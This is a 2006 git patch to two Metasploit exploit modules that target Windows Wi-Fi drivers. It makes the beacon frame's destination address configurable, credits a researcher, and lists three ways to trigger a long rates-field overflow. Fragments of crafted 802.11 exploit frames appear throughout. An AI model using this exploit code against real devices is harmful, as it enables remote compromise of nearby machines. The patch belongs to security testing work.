From 5c0176e2dd4036568b6d426bc527588c7d27b486 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 15 Nov 2006 21:23:03 +0000
Subject: [PATCH] Better credit to Gil in the comments, made ADDR_DST do
 something

git-svn-id: file:///home/svn/framework3/trunk@4141 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/driver/broadcom_wifi_ssid.rb | 2 +-
 modules/exploits/windows/driver/dlink_wifi_rates.rb   | 9 ++++++---
 2 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb
index 68e33d5a63..a203883c1f 100644
--- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb
+++ b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb
@@ -153,7 +153,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
 		"\x80" +                      # type/subtype
 		"\x00" +                      # flags
 		"\x00\x00" +                  # duration  
-		"\xff\xff\xff\xff\xff\xff" +  # dst
+		eton(datastore['ADDR_DST']) + # dst
 		"\x58\x58\x58\x58\x58\x58" +  # src
 		"\x58\x58\x58\x58\x58\x58" +  # bssid
 		"\x70\xed" +                  # sequence number
diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb
index 1f3cb1fccc..5d46f3f706 100644
--- a/modules/exploits/windows/driver/dlink_wifi_rates.rb
+++ b/modules/exploits/windows/driver/dlink_wifi_rates.rb
@@ -137,12 +137,15 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
 	end
 
 
+#
+# The following research was provided by Gil Dabah of ZERT
 #
 # The long rates field bug can be triggered three different ways (at least):
 # 1) Send a single rates IE with valid rates up front and long data
-# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
+# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
 # 3) Send two IE rates fields, with the second one containing the long data (this exploit)
 #
+ 
 	def create_beacon
 
 		ssid   = Rex::Text.rand_text_alphanumeric(6)
@@ -158,9 +161,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
 			"\x80" +                      # type/subtype
 			"\x00" +                      # flags
 			"\x00\x00" +                  # duration  
-			"\xff\xff\xff\xff\xff\xff" +  # dst
+			eton(datastore['ADDR_DST']) + # dst
 			src   +                       # src
-			bssid +                      # bssid
+			bssid +                       # bssid
 			seq   +                       # seq  
 			Rex::Text.rand_text(8) +      # timestamp value
 			"\x64\x00" +                  # beacon interval